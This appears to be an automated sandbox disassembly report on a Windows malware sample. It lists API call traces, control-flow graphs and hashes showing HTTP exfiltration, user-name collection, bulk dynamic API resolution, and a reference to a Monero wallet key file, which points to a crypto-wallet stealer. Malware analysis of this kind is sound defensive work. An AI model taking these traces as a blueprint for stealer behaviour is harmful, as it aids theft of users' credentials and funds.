                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 0c30f6a5012a72978b7e5d77b73dd5749e70cf5abb9047ab7a7e52adea499ed9
                                • Instruction ID: 61b30c3c5dac151c90ede85d8478ab387aea48bb13f3a70eeaadc03230cb7517
                                • Opcode Fuzzy Hash: 0c30f6a5012a72978b7e5d77b73dd5749e70cf5abb9047ab7a7e52adea499ed9
                                • Instruction Fuzzy Hash: C5412B607C7604FEF736B7A4A86EEDF7B667FD6710F905060AC0092380DBB06D818516
                                Function 004F4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 4f4880-4f4942 call 50a7a0 call 4f47b0 call 50a740 * 5 InternetOpenA StrCmpCA 816 4f494b-4f494f 801->816 817 4f4944 801->817 818 4f4ecb-4f4ef3 InternetCloseHandle call 50aad0 call 4f9ac0 816->818 819 4f4955-4f4acd call 508b60 call 50a920 call 50a8a0 call 50a800 * 2 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a920 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a920 call 50a8a0 call 50a800 * 2 InternetConnectA 816->819 817->816 829 4f4ef5-4f4f2d call 50a820 call 50a9b0 call 50a8a0 call 50a800 818->829 830 4f4f32-4f4fa2 call 508990 * 2 call 50a7a0 call 50a800 * 8 818->830 819->818 905 4f4ad3-4f4ad7 819->905 829->830 906 4f4ad9-4f4ae3 905->906 907 4f4ae5 905->907 908 4f4aef-4f4b22 HttpOpenRequestA 906->908 907->908 909 4f4ebe-4f4ec5 InternetCloseHandle 908->909 910 4f4b28-4f4e28 call 50a9b0 call 50a8a0 call 50a800 call 50a920 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a920 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a920 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a9b0 call 50a8a0 call 50a800 call 50a920 call 50a8a0 call 50a800 call 50a740 call 50a920 * 2 call 50a8a0 call 50a800 * 2 call 50aad0 lstrlen call 50aad0 * 2 lstrlen call 50aad0 HttpSendRequestA 908->910 909->818 1021 4f4e32-4f4e5c InternetReadFile 910->1021 1022 4f4e5e-4f4e65 1021->1022 1023 4f4e67-4f4eb9 InternetCloseHandle call 50a800 1021->1023 1022->1023 1024 4f4e69-4f4ea7 call 50a9b0 call 50a8a0 call 50a800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F4915
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00510DDB,00000000,?,?,00000000,?,",00000000,?,012DE230), ref: 004F4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004F4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004F4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F4E49
                                • InternetCloseHandle.WININET(00000000), ref: 004F4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 004F4EC5
                                • HttpOpenRequestA.WININET(00000000,012DE3F0,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F4B15
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • InternetCloseHandle.WININET(00000000), ref: 004F4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 577a0bc9b0b0f54626ae1da5cd9a5c3de526a3f5c0fe81a534ac2306db247541
                                • Instruction ID: f99eb611cbdfa64e0dabbf4b30073692e3a0b36b614c7b61de111e8661140b05
                                • Opcode Fuzzy Hash: 577a0bc9b0b0f54626ae1da5cd9a5c3de526a3f5c0fe81a534ac2306db247541
                                • Instruction Fuzzy Hash: 38121172910219AADB15EB90DD96FEEBB38BF94300F508199B106720D1EF742F49CF66
                                Function 00507850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 1fe644267693b8815edac566062be954fd99baf5d46f99feacffc41e9f0edc1f
                                • Instruction ID: 165128ef696b287b041613758099ad4f53156d7c6ac4e8053064ab28a82b5551
                                • Opcode Fuzzy Hash: 1fe644267693b8815edac566062be954fd99baf5d46f99feacffc41e9f0edc1f
                                • Instruction Fuzzy Hash: 95F044B1D44208ABD700DF94DD4ABAEFBB8FB04711F104559F645A2680C77815048BA1
                                Function 004F1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: d8b367515d1f4405bb7d02e02ba48fcf5270b3036a71d2c14f91344114b6fef5
                                • Instruction ID: deb9ed60db90f4ef4af60f4f4032050a08d370bd1627417b166cc273e0a54435
                                • Opcode Fuzzy Hash: d8b367515d1f4405bb7d02e02ba48fcf5270b3036a71d2c14f91344114b6fef5
                                • Instruction Fuzzy Hash: 96D05E7490030CEBDB00DFE0D98A6EDBB78FB0C322F000555D90562340EA355491CAAA
                                Function 00509C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 509c10-509c1a 634 509c20-50a031 GetProcAddress * 43 633->634 635 50a036-50a0ca LoadLibraryA * 8 633->635 634->635 636 50a146-50a14d 635->636 637 50a0cc-50a141 GetProcAddress * 5 635->637 638 50a153-50a211 GetProcAddress * 8 636->638 639 50a216-50a21d 636->639 637->636 638->639 640 50a298-50a29f 639->640 641 50a21f-50a293 GetProcAddress * 5 639->641 642 50a2a5-50a332 GetProcAddress * 6 640->642 643 50a337-50a33e 640->643 641->640 642->643 644 50a344-50a41a GetProcAddress * 9 643->644 645 50a41f-50a426 643->645 644->645 646 50a4a2-50a4a9 645->646 647 50a428-50a49d GetProcAddress * 5 645->647 648 50a4ab-50a4d7 GetProcAddress * 2 646->648 649 50a4dc-50a4e3 646->649 647->646 648->649 650 50a515-50a51c 649->650 651 50a4e5-50a510 GetProcAddress * 2 649->651 652 50a612-50a619 650->652 653 50a522-50a60d GetProcAddress * 10 650->653 651->650 654 50a61b-50a678 GetProcAddress * 4 652->654 655 50a67d-50a684 652->655 653->652 654->655 656 50a686-50a699 GetProcAddress 655->656 657 50a69e-50a6a5 655->657 656->657 658 50a6a7-50a703 GetProcAddress * 4 657->658 659 50a708-50a709 657->659 658->659
                                APIs
                                • GetProcAddress.KERNEL32(75900000,012C6720), ref: 00509C2D
                                • GetProcAddress.KERNEL32(75900000,012C6740), ref: 00509C45
                                • GetProcAddress.KERNEL32(75900000,012D8D18), ref: 00509C5E
                                • GetProcAddress.KERNEL32(75900000,012D8E50), ref: 00509C76
                                • GetProcAddress.KERNEL32(75900000,012DCCB8), ref: 00509C8E
                                • GetProcAddress.KERNEL32(75900000,012DCBE0), ref: 00509CA7
                                • GetProcAddress.KERNEL32(75900000,012CB298), ref: 00509CBF
                                • GetProcAddress.KERNEL32(75900000,012DCCE8), ref: 00509CD7
                                • GetProcAddress.KERNEL32(75900000,012DCBC8), ref: 00509CF0
                                • GetProcAddress.KERNEL32(75900000,012DCBF8), ref: 00509D08
                                • GetProcAddress.KERNEL32(75900000,012DCCA0), ref: 00509D20
                                • GetProcAddress.KERNEL32(75900000,012C6780), ref: 00509D39
                                • GetProcAddress.KERNEL32(75900000,012C67C0), ref: 00509D51
                                • GetProcAddress.KERNEL32(75900000,012C6800), ref: 00509D69
                                • GetProcAddress.KERNEL32(75900000,012C6820), ref: 00509D82
                                • GetProcAddress.KERNEL32(75900000,012DCD00), ref: 00509D9A
                                • GetProcAddress.KERNEL32(75900000,012DCD78), ref: 00509DB2
                                • GetProcAddress.KERNEL32(75900000,012CB0B8), ref: 00509DCB
                                • GetProcAddress.KERNEL32(75900000,012C6860), ref: 00509DE3
                                • GetProcAddress.KERNEL32(75900000,012DCD90), ref: 00509DFB
                                • GetProcAddress.KERNEL32(75900000,012DCC10), ref: 00509E14
                                • GetProcAddress.KERNEL32(75900000,012DCCD0), ref: 00509E2C
                                • GetProcAddress.KERNEL32(75900000,012DCC70), ref: 00509E44
                                • GetProcAddress.KERNEL32(75900000,012C6880), ref: 00509E5D
                                • GetProcAddress.KERNEL32(75900000,012DCB08), ref: 00509E75
                                • GetProcAddress.KERNEL32(75900000,012DCB20), ref: 00509E8D
                                • GetProcAddress.KERNEL32(75900000,012DCD60), ref: 00509EA6
                                • GetProcAddress.KERNEL32(75900000,012DCDA8), ref: 00509EBE
                                • GetProcAddress.KERNEL32(75900000,012DCB68), ref: 00509ED6
                                • GetProcAddress.KERNEL32(75900000,012DCC88), ref: 00509EEF
                                • GetProcAddress.KERNEL32(75900000,012DCC28), ref: 00509F07
                                • GetProcAddress.KERNEL32(75900000,012DCB38), ref: 00509F1F
                                • GetProcAddress.KERNEL32(75900000,012DCDC0), ref: 00509F38
                                • GetProcAddress.KERNEL32(75900000,012D9C18), ref: 00509F50
                                • GetProcAddress.KERNEL32(75900000,012DCD18), ref: 00509F68
                                • GetProcAddress.KERNEL32(75900000,012DCBB0), ref: 00509F81
                                • GetProcAddress.KERNEL32(75900000,012C68A0), ref: 00509F99
                                • GetProcAddress.KERNEL32(75900000,012DCD30), ref: 00509FB1
                                • GetProcAddress.KERNEL32(75900000,012C68C0), ref: 00509FCA
                                • GetProcAddress.KERNEL32(75900000,012DCD48), ref: 00509FE2
                                • GetProcAddress.KERNEL32(75900000,012DCDD8), ref: 00509FFA
                                • GetProcAddress.KERNEL32(75900000,012C65C0), ref: 0050A013
                                • GetProcAddress.KERNEL32(75900000,012C6620), ref: 0050A02B
                                • LoadLibraryA.KERNEL32(012DCAF0,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A03D
                                • LoadLibraryA.KERNEL32(012DCC40,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A04E
                                • LoadLibraryA.KERNEL32(012DCB50,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A060
                                • LoadLibraryA.KERNEL32(012DCB80,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A072
                                • LoadLibraryA.KERNEL32(012DCB98,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A083
                                • LoadLibraryA.KERNEL32(012DCC58,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A095
                                • LoadLibraryA.KERNEL32(012DCEC8,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A0A7
                                • LoadLibraryA.KERNEL32(012DCDF0,?,00505CA3,00510AEB,?,?,?,?,?,?,?,?,?,?,00510AEA,00510AE3), ref: 0050A0B8
                                • GetProcAddress.KERNEL32(75FD0000,012C6500), ref: 0050A0DA
                                • GetProcAddress.KERNEL32(75FD0000,012DCEF8), ref: 0050A0F2
                                • GetProcAddress.KERNEL32(75FD0000,012D89A0), ref: 0050A10A
                                • GetProcAddress.KERNEL32(75FD0000,012DCE50), ref: 0050A123
                                • GetProcAddress.KERNEL32(75FD0000,012C6600), ref: 0050A13B
                                • GetProcAddress.KERNEL32(734B0000,012CAEB0), ref: 0050A160
                                • GetProcAddress.KERNEL32(734B0000,012C6280), ref: 0050A179
                                • GetProcAddress.KERNEL32(734B0000,012CAF00), ref: 0050A191
                                • GetProcAddress.KERNEL32(734B0000,012DCF10), ref: 0050A1A9
                                • GetProcAddress.KERNEL32(734B0000,012DCE08), ref: 0050A1C2
                                • GetProcAddress.KERNEL32(734B0000,012C62E0), ref: 0050A1DA
                                • GetProcAddress.KERNEL32(734B0000,012C6460), ref: 0050A1F2
                                • GetProcAddress.KERNEL32(734B0000,012DCF40), ref: 0050A20B
                                • GetProcAddress.KERNEL32(763B0000,012C6640), ref: 0050A22C
                                • GetProcAddress.KERNEL32(763B0000,012C6580), ref: 0050A244
                                • GetProcAddress.KERNEL32(763B0000,012DCE20), ref: 0050A25D
                                • GetProcAddress.KERNEL32(763B0000,012DCF70), ref: 0050A275
                                • GetProcAddress.KERNEL32(763B0000,012C64A0), ref: 0050A28D
                                • GetProcAddress.KERNEL32(750F0000,012CB0E0), ref: 0050A2B3
                                • GetProcAddress.KERNEL32(750F0000,012CB2C0), ref: 0050A2CB
                                • GetProcAddress.KERNEL32(750F0000,012DCFA0), ref: 0050A2E3
                                • GetProcAddress.KERNEL32(750F0000,012C65E0), ref: 0050A2FC
                                • GetProcAddress.KERNEL32(750F0000,012C6300), ref: 0050A314
                                • GetProcAddress.KERNEL32(750F0000,012CAFC8), ref: 0050A32C
                                • GetProcAddress.KERNEL32(75A50000,012DCE38), ref: 0050A352
                                • GetProcAddress.KERNEL32(75A50000,012C6380), ref: 0050A36A
                                • GetProcAddress.KERNEL32(75A50000,012D88F0), ref: 0050A382
                                • GetProcAddress.KERNEL32(75A50000,012DCE68), ref: 0050A39B
                                • GetProcAddress.KERNEL32(75A50000,012DCE80), ref: 0050A3B3
                                • GetProcAddress.KERNEL32(75A50000,012C64E0), ref: 0050A3CB
                                • GetProcAddress.KERNEL32(75A50000,012C63C0), ref: 0050A3E4
                                • GetProcAddress.KERNEL32(75A50000,012DCE98), ref: 0050A3FC
                                • GetProcAddress.KERNEL32(75A50000,012DCEB0), ref: 0050A414
                                • GetProcAddress.KERNEL32(75070000,012C63A0), ref: 0050A436
                                • GetProcAddress.KERNEL32(75070000,012DCF88), ref: 0050A44E
                                • GetProcAddress.KERNEL32(75070000,012DCEE0), ref: 0050A466
                                • GetProcAddress.KERNEL32(75070000,012DCF28), ref: 0050A47F
                                • GetProcAddress.KERNEL32(75070000,012DCF58), ref: 0050A497
                                • GetProcAddress.KERNEL32(74E50000,012C6480), ref: 0050A4B8
                                • GetProcAddress.KERNEL32(74E50000,012C6440), ref: 0050A4D1
                                • GetProcAddress.KERNEL32(75320000,012C62C0), ref: 0050A4F2
                                • GetProcAddress.KERNEL32(75320000,012DC898), ref: 0050A50A
                                • GetProcAddress.KERNEL32(6F060000,012C6660), ref: 0050A530
                                • GetProcAddress.KERNEL32(6F060000,012C62A0), ref: 0050A548
                                • GetProcAddress.KERNEL32(6F060000,012C65A0), ref: 0050A560
                                • GetProcAddress.KERNEL32(6F060000,012DC9B8), ref: 0050A579
                                • GetProcAddress.KERNEL32(6F060000,012C63E0), ref: 0050A591
                                • GetProcAddress.KERNEL32(6F060000,012C6320), ref: 0050A5A9
                                • GetProcAddress.KERNEL32(6F060000,012C6400), ref: 0050A5C2
                                • GetProcAddress.KERNEL32(6F060000,012C6340), ref: 0050A5DA
                                • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0050A5F1
                                • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0050A607
                                • GetProcAddress.KERNEL32(74E00000,012DCA60), ref: 0050A629
                                • GetProcAddress.KERNEL32(74E00000,012D8820), ref: 0050A641
                                • GetProcAddress.KERNEL32(74E00000,012DC9D0), ref: 0050A659
                                • GetProcAddress.KERNEL32(74E00000,012DCA78), ref: 0050A672
                                • GetProcAddress.KERNEL32(74DF0000,012C6520), ref: 0050A693
                                • GetProcAddress.KERNEL32(6F9C0000,012DC8B0), ref: 0050A6B4
                                • GetProcAddress.KERNEL32(6F9C0000,012C6540), ref: 0050A6CD
                                • GetProcAddress.KERNEL32(6F9C0000,012DC970), ref: 0050A6E5
                                • GetProcAddress.KERNEL32(6F9C0000,012DC910), ref: 0050A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
